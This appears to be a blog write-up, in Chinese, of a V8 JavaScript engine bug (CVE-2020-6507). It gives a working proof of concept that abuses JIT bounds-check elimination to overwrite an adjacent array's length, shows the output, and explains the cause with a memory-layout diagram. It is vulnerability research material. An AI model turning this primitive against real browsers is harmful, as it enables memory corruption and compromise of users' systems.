poc

$ cat poc.js

array = Array(0x40000).fill(1.1);

args = Array(0x100 - 1).fill(array);

args.push(Array(0x40000 - 4).fill(2.2));

giant_array = Array.prototype.concat.apply([], args);

giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);

length_as_double =

    new Float64Array(new BigUint64Array([0x22222222n]).buffer)[0];

function trigger(array, oob) {

  var x = array.length;

  x -= 67108861; // 1 2

  x = Math.max(x, 0);

  x *= 10; // 10 20

  x -= 9; // 1 11

  x = Math.max(x, 0);

  oob[x] = length_as_double; // fake length

}

for (let i = 0; i < 30000; ++i) {

  vul = [1.1, 2.1];

  pad = [vul];

  double_array = [3.1];

  obj = {"a": 2.1};

  obj_array = [obj];

  trigger(giant_array, vul);

}

console.log("length = ", double_array.length.toString(16));

$ ./d8 poc.js

length =  11111111

漏洞原因分析

NewFixedArray和NewFixedDoubleArray没有对数组的大小进行判断.kFixedDoubleArrayMaxLength = 671088612。所以浮点数组的最大长度为67108862。

giant_array长度为0x40000*0xff + 0x3fffc + 3 = 67108863,其中splice函数会调用NewFixedDoubleArray函数,造成数组长度超过kFixedDoubleArrayMaxLength。

传入giant_array后trigger函数计算得到x为11,而vul长度为2,正常情况下是不会造成越界读写的。

但是v8在执行代码时会进行jit优化,去除掉冗余代码,加速代码执行。在正常情况下trigger函数会默认传入的数组长度<=kFixedDoubleArrayMaxLength.这样子计算出来的x为0或1,而vul[0]或vul[1]是可以正常访问的,那么jit在优化时就会将长度检查这部分优化掉。而我们得到的x为11,这样就可以越界读写,而vul[11]这个位置正是double_array的length位。

内存分布大概如下

 32 bit map                      | 32 bit length

 64 bit double vul[0]

 64 bit double vul[1]

 32 bit map                      | 32 bit properties

 32 bit elements                 | 32 bit length

 32 bit map                      | 32 bit length

 32 bit pad[0]                   | 32 bit map

 32 bit properties               | 32 bit elements

 32 bit length                   | 32 bit map

 32 bit length                   | high 32 bit of double_array[0]

 low 32 bit of double_array[0]   | 32 bit map

 32 bit properties               | 32 bit elements

 32 bit length

cve_2020_6507分析的更多相关文章

  1. alias导致virtualenv异常的分析和解法

    title: alias导致virtualenv异常的分析和解法 toc: true comments: true date: 2016-06-27 23:40:56 tags: [OS X, ZSH ...

  2. 火焰图分析openresty性能瓶颈

    注:本文操作基于CentOS 系统 准备工作 用wget从https://sourceware.org/systemtap/ftp/releases/下载最新版的systemtap.tar.gz压缩包 ...

  3. 一起来玩echarts系列(一)------箱线图的分析与绘制

    一.箱线图 Box-plot 箱线图一般被用作显示数据分散情况.具体是计算一组数据的中位数.25%分位数.75%分位数.上边界.下边界,来将数据从大到小排列,直观展示数据整体的分布情况. 大部分正常数 ...

  4. 应用工具 .NET Portability Analyzer 分析迁移dotnet core

    大多数开发人员更喜欢一次性编写好业务逻辑代码,以后再重用这些代码.与构建不同的应用以面向多个平台相比,这种方法更加容易.如果您创建与 .NET Core 兼容的.NET 标准库,那么现在比以往任何时候 ...

  5. UWP中新加的数据绑定方式x:Bind分析总结

    UWP中新加的数据绑定方式x:Bind分析总结 0x00 UWP中的x:Bind 由之前有过WPF开发经验,所以在学习UWP的时候直接省略了XAML.数据绑定等几个看着十分眼熟的主题.学习过程中倒是也 ...

  6. 查看w3wp进程占用的内存及.NET内存泄露,死锁分析

    一 基础知识 在分析之前,先上一张图: 从上面可以看到,这个w3wp进程占用了376M内存,启动了54个线程. 在使用windbg查看之前,看到的进程含有 *32 字样,意思是在64位机器上已32位方 ...

  7. ZIP压缩算法详细分析及解压实例解释

    最近自己实现了一个ZIP压缩数据的解压程序,觉得有必要把ZIP压缩格式进行一下详细总结,数据压缩是一门通信原理和计算机科学都会涉及到的学科,在通信原理中,一般称为信源编码,在计算机科学里,一般称为数据 ...

  8. ABP源码分析一:整体项目结构及目录

    ABP是一套非常优秀的web应用程序架构,适合用来搭建集中式架构的web应用程序. 整个Abp的Infrastructure是以Abp这个package为核心模块(core)+15个模块(module ...

  9. HashMap与TreeMap源码分析

    1. 引言     在红黑树--算法导论(15)中学习了红黑树的原理.本来打算自己来试着实现一下,然而在看了JDK(1.8.0)TreeMap的源码后恍然发现原来它就是利用红黑树实现的(很惭愧学了Ja ...

  10. ElasticSearch 5学习(9)——映射和分析(string类型废弃)

    在ElasticSearch中,存入文档的内容类似于传统数据每个字段一样,都会有一个指定的属性,为了能够把日期字段处理成日期,把数字字段处理成数字,把字符串字段处理成字符串值,Elasticsearc ...

随机推荐

  1. springboot---多环境启动命令格式

    一.多环境命令启动 maven插件中首先clean,再package打包,(修改字符集为UTF-8) 使用cmd命令java -jar s(Tab键自动补全)  -spring.profiles.ac ...

  2. day01-SpringCloud基本介绍

    SpringCloud基本介绍 SpringCloud官方文档 1.提出问题 先思考一个问题,没有微服务技术,是不是程序员就不能开发大型项目? 是可以的,对大型项目进行模块划分,对各个模块进行实现.但 ...

  3. flutter系列之:在flutter中使用相机拍摄照片

    目录 简介 使用相机前的准备工作 在flutter中使用camera 总结 简介 在app中使用相机肯定是再平常不过的一项事情了,相机肯定涉及到了底层原生代码的调用,那么在flutter中如何快速简单 ...

  4. kubernetes(k8s)中部署 efk

    Kubernetes 开发了一个 Elasticsearch 附加组件来实现集群的日志管理.这是一个 Elasticsearch.Fluentd 和 Kibana 的组合. Elasticsearch ...

  5. 【算法总结】强化学习部分基础算法总结(Q-learning DQN PG AC DDPG TD3)

    总结回顾一下近期学习的RL算法,并给部分实现算法整理了流程图.贴了代码. 1. value-based 基于价值的算法 基于价值算法是通过对agent所属的environment的状态或者状态动作对进 ...

  6. [Linux]常用命令之【mount/umount】

    1 mount mount命令的作用是加载文件系统,它的用权限是超级用户或/etc/fstab中允许的使用者. 在Linux和Unix系统上,所有文件都是作为一个大型树(以/为根)的一部分访问的. 要 ...

  7. C++11强制类型转换

    C++ 强制类型转换有四种关键字:static_cast.const_cast.reinterpret_cast和dynamic_cast.它们用于不同的情况和目的,比C语言的强制类型转换更清晰和安全 ...

  8. [python] Python枚举模块enum总结

    枚举是一种数据类型,在编程中用于表示一组相关的常量.枚举中的每个常量都有一个名称和一个对应的值,可以用于增强代码的可读性和可维护性.在Python中,枚举是由enum模块提供的,而不是Python提供 ...

  9. Gin框架快速入门

    github地址: https://github.com/gin-gonic/gin 初体验 安装: $ go get -u github.com/gin-gonic/gin 简单实例: packag ...

  10. Spring注解@Conditional相关用法

    1.@Conditional注解 @Conditional 是Spring4新提供的注解. 它的作用是按照一定的条件进行判断,满足条件给容器注册bean,否则不注入. 可以作用在方法上,也可以作用在类 ...